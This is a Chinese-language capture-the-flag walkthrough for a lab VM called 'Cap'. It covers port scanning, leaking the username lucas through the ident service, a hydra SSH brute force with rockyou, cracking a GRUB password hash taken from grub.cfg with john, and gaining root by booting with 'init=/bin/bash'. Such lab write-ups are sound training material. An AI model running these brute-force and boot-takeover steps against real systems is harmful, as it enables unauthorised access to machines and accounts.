# 靶场搭建

下载:Cap

Nat,IP: 192.168.1.179

# 渗透过程

# 信息初收集

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
|   256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_  256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
80/tcp open  http    Apache httpd 2.4.56 ((Debian))
|_http-title: Apache2 Debian Default Page: It w
┌──(root㉿kali)-[~]
└─# nmap -6 -p- -A fe80::20c:29ff:fe15:15d2%eth0
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-03 04:46 EDT
Nmap scan report for fe80::20c:29ff:fe15:15d2
Host is up (0.00055s latency).
Not shown: 65532 closed tcp ports (reset)
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
80/tcp  open  http    Apache httpd 2.4.56 ((Debian))
113/tcp open  ident?

名称是 Cap,要监听流量,所以打开 wireshark,连接一下 113 端口 ncat -6 fe80::20c:29ff:fe15:15d2%eth0 113

看到本地的端口,发送 113,本地端口 得到用户名 lucas

爆破一下密码: hydra -l lucas -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.179 -I -t 64

拿到了密码: capricorn

信息收集发现 /boot/grub/grub.cfg 文件,里面有哈希,解密

grub.pbkdf2.sha512.10000.E9DF42546DD8E4FA1D59A023BF0E3D9C83FFE8F0C1DE14FB88BCCCBBE5BD8FA7DAF1A9AC25593A43E094F8F00E8D0CDF81F066993234AC53DF5EE59BDD288E82.85C7A1032D4FA7D74E645A13DEBE367CFBF5A3AE7B1378D99BC2D00FF9EF8187F602865B972B538BC1678E17EEFE7A27C80AC1DD96D906FC1FBA5079779F163E

john 解密结果: starwars

su 不过去,ssh 连不上

看了 WP 之后,发现需要重启,然后进入编辑模式进行,要实体操作

进入编辑模式用这个密码,然后把 ro 改成 rw init=/bin/bash

F10 保存重启,就拿到了 root 权限

可以 passwd 改一下密码,可以 su 过去了